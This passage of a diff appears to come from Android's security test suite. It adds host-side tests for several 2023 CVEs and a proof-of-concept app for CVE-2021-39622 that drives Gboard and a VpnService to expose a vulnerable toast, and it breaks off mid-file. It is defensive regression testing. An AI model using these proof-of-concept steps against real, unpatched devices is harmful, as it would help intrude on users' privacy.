+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", getDevice());
+ } catch (Exception ignored) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java
new file mode 100644
index 0000000..fed42d6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21279 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277741109)
+ @Test
+ public void testPocCVE_2023_21279() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21279";
+
+ // Install test app in device
+ installPackage("CVE-2023-21279.apk", "-g");
+
+ // Create new user and save a screenshot in that user
+ final int currentUserId = device.getCurrentUser();
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21279_user")
+ .doSwitch()
+ .withUser()) {
+ int userId = device.getCurrentUser();
+ device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+ // Wait for screenshot to get saved in the created user
+ final long timeout = 5_000L;
+ final long waitPerIteration = 500L;
+ boolean screenshotSaved = false;
+ IRunUtil runUtil = RunUtil.getDefault();
+ long start = System.currentTimeMillis();
+ do {
+ screenshotSaved =
+ device.executeShellCommand(
+ "content query --user "
+ + userId
+ + " --projection _id --uri"
+ + " content://media/external/images/media/")
+ .contains("Row");
+ if (screenshotSaved) {
+ break;
+ }
+ runUtil.sleep(waitPerIteration);
+ } while (System.currentTimeMillis() - start <= timeout);
+ assumeTrue(
+ "Screenshot was not saved in the created userId = " + userId,
+ screenshotSaved);
+ // Switch back to original user
+ assumeTrue(device.switchUser(currentUserId));
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21279");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java
new file mode 100644
index 0000000..d4ce9a4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21285 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 271851153)
+ @Test
+ public void testPocCVE_2023_21285() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21285";
+ installPackage("CVE-2023-21285.apk");
+
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(getDevice())
+ .name("cve_2023_21285_user")
+ .withUser()) {
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21285");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java
new file mode 100644
index 0000000..31494b2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21286 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277740082)
+ @Test
+ public void testPocCVE_2023_21286() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21286";
+
+ // Install test app in device
+ installPackage("CVE-2023-21286.apk", "-g");
+
+ // Create new user and save a screenshot in that user
+ final int currentUserId = device.getCurrentUser();
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21286_user")
+ .doSwitch()
+ .withUser()) {
+ int userId = device.getCurrentUser();
+ device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+ // Wait for screenshot to get saved in the created user
+ final long timeout = 5_000L;
+ final long waitPerIteration = 500L;
+ boolean screenshotSaved = false;
+ IRunUtil runUtil = RunUtil.getDefault();
+ long start = System.currentTimeMillis();
+ do {
+ screenshotSaved =
+ device.executeShellCommand(
+ "content query --user "
+ + userId
+ + " --projection _id --uri"
+ + " content://media/external/images/media/")
+ .contains("Row");
+ if (screenshotSaved) {
+ break;
+ }
+ runUtil.sleep(waitPerIteration);
+ } while (System.currentTimeMillis() - start <= timeout);
+ assumeTrue(
+ "Screenshot was not saved in the created userId = " + userId,
+ screenshotSaved);
+ // Switch back to original user
+ assumeTrue(device.switchUser(currentUserId));
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21286");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java
new file mode 100644
index 0000000..d197a92
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.SystemUtil;
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21291 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277593270)
+ @Test
+ public void testPocCVE_2023_21291() {
+ try {
+ // Install application
+ installPackage("CVE-2023-21291.apk", "-g");
+
+ // Create a secondary user cve_2023_21291_user and enable global hidden_api_policy to
+ // access hidden field in DeviceTest
+ ITestDevice device = getDevice();
+ try (AutoCloseable closable =
+ SystemUtil.withSetting(device, "global", "hidden_api_policy", "1");
+ AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21291_user")
+ .withUser()) {
+
+ // Run DeviceTest
+ final String testPkg = "android.security.cts.CVE_2023_21291";
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21291");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java
new file mode 100644
index 0000000..06dffc4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_35669 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 265798288)
+ @Test
+ public void testPocCVE_2023_35669() {
+ try {
+ // Install the test and target apps
+ installPackage("CVE-2023-35669-test.apk");
+ installPackage("CVE-2023-35669-target.apk");
+
+ final String testPkg = "android.security.cts.CVE_2023_35669_test";
+
+ // Run the test "testCVE_2023_35669"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_35669");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java
new file mode 100644
index 0000000..a489cea
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_40120 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 274775190)
+ @Test
+ public void testPocCVE_2023_40120() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_40120";
+ installPackage("CVE-2023-40120.apk");
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_40120");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // To exit test gracefully
+ getDevice().executeShellV2Command("input keyevent KEYCODE_HOME");
+ } catch (Exception e) {
+ // ignore the exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java b/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java
new file mode 100644
index 0000000..da60be3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java
@@ -0,0 +1,95 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.SystemUtil.withSetting;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class TestLocationScanningServicesUsingSlices extends NonRootSecurityTestCase {
+ private final String mTestPkg = "android.security.cts.TestLocationScanningServicesUsingSlices";
+ private final String mTestClass = mTestPkg + "." + "DeviceTest";
+ private ITestDevice mDevice = null;
+
+ @Before
+ public void setUp() {
+ try {
+ mDevice = getDevice();
+
+ // Install test app
+ installPackage("TestLocationScanningServicesUsingSlices.apk", "-t");
+
+ // Set test app as device owner
+ assumeTrue(
+ mDevice.setDeviceOwner(
+ mTestPkg + "/.PocDeviceAdminReceiver", mDevice.getCurrentUser()));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @After
+ public void tearDown() {
+ try {
+ mDevice.removeAdmin(mTestPkg + "/.PocDeviceAdminReceiver", mDevice.getCurrentUser());
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", mDevice);
+ } catch (Exception ignored) {
+ // ignore all exceptions
+ }
+ }
+
+ // b/277333781
+ // Vulnerable module : com.android.settings
+ // Vulnerable apk : Settings.apk
+ @AsbSecurityTest(cveBugId = 277333781)
+ @Test
+ public void testPocCVE_2023_21247() {
+ try (AutoCloseable withBluetoothDisabled =
+ withSetting(mDevice, "global", "ble_scan_always_enabled", "0")) {
+ runDeviceTests(mTestPkg, mTestClass, "testPocCVE_2023_21247");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ // b/277333746
+ // Vulnerable module : com.android.settings
+ // Vulnerable apk : Settings.apk
+ @AsbSecurityTest(cveBugId = 277333746)
+ @Test
+ public void testPocCVE_2023_21248() {
+ try (AutoCloseable withWifiDisabled =
+ withSetting(mDevice, "global", "wifi_scan_always_enabled", "0")) {
+ runDeviceTests(mTestPkg, mTestClass, "testPocCVE_2023_21248");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java b/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
index 28041b1..169822d 100644
--- a/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
+++ b/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
@@ -69,6 +69,17 @@
}
}
+ /**
+ * Computes an appId from uid
+ *
+ * @param uid The uid of the app
+ * @return The app id of the app
+ * @see android.os.UserHandle#getAppId
+ */
+ private static int getAppId(int uid) {
+ return uid % 100000;
+ }
+
@Override
public boolean onCreate() {
mChooserUid = getChooserUid(getContext());
@@ -145,7 +156,7 @@
UserHandle caller = getCallingUserHandle();
if (!myUserHandle().equals(caller)) {
int callingUid = getCallingUid();
- if (callingUid != mChooserUid) {
+ if (getAppId(callingUid) != getAppId(mChooserUid)) {
Log.w(TAG, "Ignoring cross-user access by package " + getCallingPackage()
+ " (uid=" + callingUid + ")");
return;
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
index faf549e..b0493f1 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
@@ -16,6 +16,7 @@
-->
<resources>
+ <string name="deviceLockFailMessage">Device is not Locked!</string>
<string name="helperAppPackage">android.security.cts.CVE_2021_0595_helper</string>
<string name="launchSecondPocActivityAction">launchSecondPocActivity</string>
<string name="testFailMessage">Vulnerable to b/177457096</string>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
index 431d445..b3784f5 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
@@ -19,10 +19,11 @@
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeTrue;
import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
import android.app.Instrumentation;
+import android.app.KeyguardManager;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Context;
@@ -72,6 +73,9 @@
// Swipe/Remove Lock Screen
device.pressMenu();
+ assumeTrue(
+ context.getString(R.string.deviceLockFailMessage),
+ context.getSystemService(KeyguardManager.class).isDeviceLocked());
assertFalse(
context.getString(R.string.testFailMessage),
context.getString(R.string.helperAppPackage)
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp
new file mode 100644
index 0000000..1a8fd19
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-39622",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml
new file mode 100644
index 0000000..5ee0e4b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_39622">
+ <application>
+ <service
+ android:name=".PocService"
+ android:exported="true"
+ android:permission="android.permission.BIND_VPN_SERVICE">
+ <intent-filter>
+ <action android:name="android.net.VpnService" />
+ </intent-filter>
+ </service>
+ <activity android:name=".PocActivity"
+ android:windowSoftInputMode="stateVisible"
+ android:exported="true" />
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_39622" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml
new file mode 100644
index 0000000..103a118
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<resources>
+ <string name="gboardPkgName">com.google.android.inputmethod.latin</string>
+ <string name="ipv4Address">192.0.0.0</string>
+ <string name="micIconResId">key_pos_header_voice</string>
+ <string name="okButtonText">ok</string>
+ <string name="port">0.0.0.0</string>
+ <string name="runnable">CVE_2021_39622_vpnServiceRunnable</string>
+ <string name="vpnSessionName">CVE_2021_39622_vpnService</string>
+ <string name="vulnerableViewText">.*Gboard needs microphone access to enable voice typing.*
+ </string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java
new file mode 100644
index 0000000..4ffc6d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java
@@ -0,0 +1,106 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.content.Context;
+import android.content.Intent;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private static final int TIMEOUT_MS = 5000;
+ private UiDevice mUiDevice;
+
+ public void checkVulnerability(BySelector micIcon, BySelector vulText) {
+ try {
+ // Click microphone icon to expose the vulnerable toast
+ mUiDevice.wait(Until.hasObject(micIcon), TIMEOUT_MS);
+ mUiDevice.findObject(micIcon).click();
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+
+ assertFalse(mUiDevice.wait(Until.hasObject(vulText), TIMEOUT_MS));
+ }
+
+ @Test
+ public void testPocCVE_2021_39622() {
+ try {
+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ mUiDevice = UiDevice.getInstance(instrumentation);
+ Context context = instrumentation.getTargetContext();
+
+ // Show Gboard and prepare VpnService
+ context.startActivity(
+ new Intent(context, PocActivity.class).setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // OK button is used to allow vpn connection request
+ BySelector okButton =
+ By.text(
+ Pattern.compile(
+ context.getString(R.string.okButtonText),
+ Pattern.CASE_INSENSITIVE));
+
+ BySelector micIcon =
+ By.res(
+ context.getString(R.string.gboardPkgName),
+ context.getString(R.string.micIconResId));
+
+ BySelector vulText =
+ By.text(
+ Pattern.compile(
+ context.getString(R.string.vulnerableViewText),
+ Pattern.CASE_INSENSITIVE));
+
+ mUiDevice.wait(Until.hasObject(okButton), TIMEOUT_MS);
+ mUiDevice.findObject(okButton).click();
+
+ // In case permission was already denied using permission dialog box earlier, the
+ // permission dialog box does not appear and the mic icon of gboard appears
+ // unhighlighted indicating that mic permission is denied. Upon clicking the
+ // unhighlighted mic icon, vulnerable toast is visible.
+ checkVulnerability(micIcon, vulText);
+
+ // In case permission was not denied using permission dialog box earlier, the permission
+ // dialog box appears and pressing back turns the mic icon unhighlighted.
+ mUiDevice.pressBack();
+
+ // Check vulnerability after the mic icon is unhighlighted
+ checkVulnerability(micIcon, vulText);
+
+ // With fix the allow mic permission dialog box remains on screen
+ mUiDevice.pressHome();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java
new file mode 100644
index 0000000..a7e088b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.VpnService;
+import android.os.Bundle;
+import android.widget.EditText;
+
+public class PocActivity extends Activity {
+ private static final int REQUEST_CODE = 0;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+ EditText editText = new EditText(this);
+ setContentView(editText);
+ editText.requestFocus();
+
+ // Prepare VpnService
+ Intent intent = VpnService.prepare(this);
+ startActivityForResult(intent, REQUEST_CODE);
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ }
+
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ try {
+ if (requestCode == REQUEST_CODE && resultCode == RESULT_OK) {
+ // Start VpnService
+ startService(new Intent(this, PocService.class));
+ }
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java
new file mode 100644
index 0000000..2863ea3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java
@@ -0,0 +1,54 @@
